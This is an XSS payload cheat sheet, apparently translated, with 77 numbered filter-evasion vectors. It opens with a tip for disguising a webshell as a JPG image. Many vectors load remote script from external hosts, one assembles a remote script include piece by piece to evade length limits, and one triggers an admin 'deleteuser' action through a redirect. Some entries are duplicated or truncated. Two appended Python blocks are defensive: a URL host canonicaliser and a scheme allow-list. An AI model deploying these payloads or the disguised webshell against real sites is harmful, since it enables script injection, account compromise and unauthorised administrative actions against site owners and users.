Cross-site image shell
XSS cross-site code: <script>alert("")</script>

Put the code in the first line of the webshell and change the webshell into JPG image format; when the image-format webshell is accessed, our webshell is executed too.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters have basically no effect in China, because there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) End TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added after it (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (an open angle bracket followed by a letter is enough)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE approach
expression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash movie that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can smuggle your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; it can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) Decimal (dword) IP
<A HREF="http://3232235521">XSS</A>

(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS (trailing dot)
<A HREF="http://www.google.com./">XSS</A>
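
Items (68) to (76) defeat filters that compare the raw host string in a link. A browser resolves a dword, hex, octal or mixed-radix IPv4 literal to the same address, deletes tab and newline characters from the URL before parsing it, and treats a trailing dot or a missing scheme as the same destination, so a host allow-list has to canonicalise first. The Python below is an added example, not code from this post: it implements the legacy IPv4 literal parsing that browsers still accept (as specified by the WHATWG URL standard) and then applies an exact-match allow-list over canonical hosts. The sample links are constructed from the vectors above; the spaces in item (73) are assumed to stand for tab and newline characters flattened when the post was copied, and the allowed-host set is an assumed policy.

```python
import ipaddress
import re
from typing import Dict, Optional, Set
from urllib.parse import urlsplit

# Browsers delete ASCII tab, LF and CR anywhere in a URL before parsing (item 73).
_TAB_NEWLINE = re.compile(r"[\t\n\r]")


def _ipv4_number(part: str) -> int:
    """Parse one dotted component the way browsers do: 0x.. hex, leading 0 octal, else decimal."""
    lower = part.lower()
    if lower.startswith("0x"):
        return int(lower[2:], 16) if len(lower) > 2 else 0
    if len(part) > 1 and part.startswith("0"):
        return int(part, 8)
    return int(part, 10)


def normalize_ipv4_literal(host: str) -> Optional[str]:
    """Dotted-quad form of any IPv4 spelling a browser accepts, else None.

    One to four components are allowed (items 70-73); the last component
    fills all remaining bytes, so "3232235521" and "0xc0.0xa8.1" are both
    192.168.0.1.  Anything that is not a number is treated as a domain name.
    """
    parts = host.split(".")
    if len(parts) > 1 and parts[-1] == "":
        parts.pop()                        # "1.2.3.4." is accepted with a trailing dot
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_ipv4_number(p) for p in parts]
    except ValueError:
        return None                        # not an IPv4 literal
    if any(n > 255 for n in nums[:-1]) or nums[-1] >= 256 ** (5 - len(nums)):
        return None
    value = 0
    for n in nums[:-1]:
        value = value * 256 + n
    value = value * 256 ** (5 - len(nums)) + nums[-1]
    return str(ipaddress.IPv4Address(value))


def canonical_host(url: str) -> Optional[str]:
    """Host of a link as the browser will resolve it, or None if it has none."""
    cleaned = _TAB_NEWLINE.sub("", url.strip())
    try:
        host = urlsplit(cleaned).hostname  # lower-cased, credentials and port removed;
    except ValueError:                     # "//host/" (item 74) parses without a scheme
        return None
    if not host:
        return None                        # e.g. javascript: links carry no host
    host = host.rstrip(".")                # trailing dot names the same host (item 76)
    return normalize_ipv4_literal(host) or host


def link_is_allowed(url: str, allowed_hosts: Set[str]) -> bool:
    """Exact-match allow-list over canonical hosts (no endswith shortcuts)."""
    host = canonical_host(url)
    return host is not None and host in allowed_hosts


# Constructed samples shaped like items (68)-(76); the tabs and newline in the
# mixed case are an assumption about what the post's spaces stood for.
SAMPLE_LINKS = {
    "dword": "http://3232235521",
    "hex": "http://0xc0.0xa8.0x00.0x01",
    "octal": "http://0300.0250.0000.0001",
    "mixed": "h\ntt\tp://6\t6.000146.0x7.147/",
    "no_scheme": "//www.google.com/",
    "trailing_dot": "http://www.google.com./",
    "js_scheme": "javascript:document.location='http://www.google.com/'",
}


def canonical_hosts() -> Dict[str, Optional[str]]:
    """Canonical host for every sample link."""
    return {name: canonical_host(u) for name, u in SAMPLE_LINKS.items()}


if __name__ == "__main__":
    for name, host in canonical_hosts().items():
        print(f"{name:>13}: {host}")
```

Because the match is exact, "http://google.com/" (item 75) is rejected unless "google.com" is itself on the list; list every accepted host explicitly rather than matching on a suffix, and run the same canonicalisation on the server side before any redirect or fetch that a user-supplied URL controls.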

(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
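
Items (3) to (19), (47) and (77) all rely on one weakness: a filter that looks for the literal string javascript: in an attribute value, while the browser tolerates mixed case, leading whitespace, embedded tab/newline/CR characters, NUL bytes and HTML character references before it resolves the scheme. The Python below is an added example, not code from this post: it normalises a URL-valued attribute the way a browser would and then allow-lists the scheme instead of deny-listing javascript and vbscript. The function names, the allowed-scheme set and the sample values are my own; the samples are constructed from the vector shapes above.

```python
import html
import re
from typing import List, Optional

# Characters browsers discard inside a URL before resolving its scheme
# (ASCII tab, LF, CR), plus the NUL byte from the null-character items.
_DISCARDED = re.compile(r"[\t\n\r\x00]")
# Leading C0 control characters and spaces are trimmed by URL parsers.
_LEADING_JUNK = re.compile(r"^[\x00-\x20]+")

# Allow-list of schemes a URL-valued attribute (SRC, HREF, BACKGROUND,
# url(...)) may carry.  A deny-list of javascript/vbscript would miss data:
# and any scheme added later.  Assumed policy; adjust per application.
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def normalize_url_value(value: str) -> str:
    """Approximate the browser's view of an attribute value.

    1. decode HTML character references, repeated until stable so that
       double-encoded references (&amp;#106;) are also resolved
    2. drop tab/newline/CR/NUL characters (the split and null-byte items)
    3. trim leading whitespace and control characters (the leading-space items)
    """
    previous = None
    while previous != value:
        previous, value = value, html.unescape(value)
    value = _DISCARDED.sub("", value)
    return _LEADING_JUNK.sub("", value)


def url_scheme(value: str) -> Optional[str]:
    """Lower-cased scheme of a normalised value, or None for relative URLs."""
    match = re.match(r"([A-Za-z][A-Za-z0-9+.-]*):", value)
    return match.group(1).lower() if match else None


def is_safe_url_attribute(raw: str) -> bool:
    """True if the value is relative or uses an allow-listed scheme.

    This decides the scheme only; which hosts a link may point at is a
    separate allow-list check, and event-handler attributes such as onload
    (item 21) should never receive user-controlled data at all.
    """
    scheme = url_scheme(normalize_url_value(raw))
    return scheme is None or scheme in ALLOWED_SCHEMES


# Constructed samples shaped like the vectors in this post (inputs to the
# check, not live payloads).
SAMPLES = {
    "plain": "javascript:alert('XSS')",
    "mixed_case": "JaVaScRiPt:alert('XSS')",
    "entity": "&#106;&#97;&#118;&#97;script:alert('XSS')",
    "tab_split": "jav\tascript:alert('XSS')",
    "leading_space": "  javascript:alert('XSS')",
    "nul": "java\x00script:alert('XSS')",
    "vbscript": "vbscript:msgbox(\"XSS\")",
    "ok_http": "http://3w.org/XSS/xss.js",
    "ok_relative": "/img/logo.png",
}


def flagged_samples() -> List[str]:
    """Names of the samples the check rejects, sorted."""
    return sorted(name for name, value in SAMPLES.items()
                  if not is_safe_url_attribute(value))


if __name__ == "__main__":
    for name in flagged_samples():
        print("rejected:", name)
```

Apply this only at the point where a URL is written into an attribute, after the template has already done its context-specific encoding; the allow-list is what makes the check survive a new scheme, since every vector on this page that varies only the spelling of javascript: collapses to the same scheme once the value is normalised.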